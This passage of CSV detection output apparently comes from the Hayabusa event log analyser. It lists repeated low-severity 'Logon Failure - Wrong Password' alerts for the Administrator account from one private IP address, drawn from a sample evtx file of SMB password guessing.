Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NiVgC8oJ5W2Xr3t0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hXfhdrbLnNOGDqy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcjMGbrHQHxIhSSh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDYPTYHHKAe39GjM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PF3H6LE6MqFjVWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
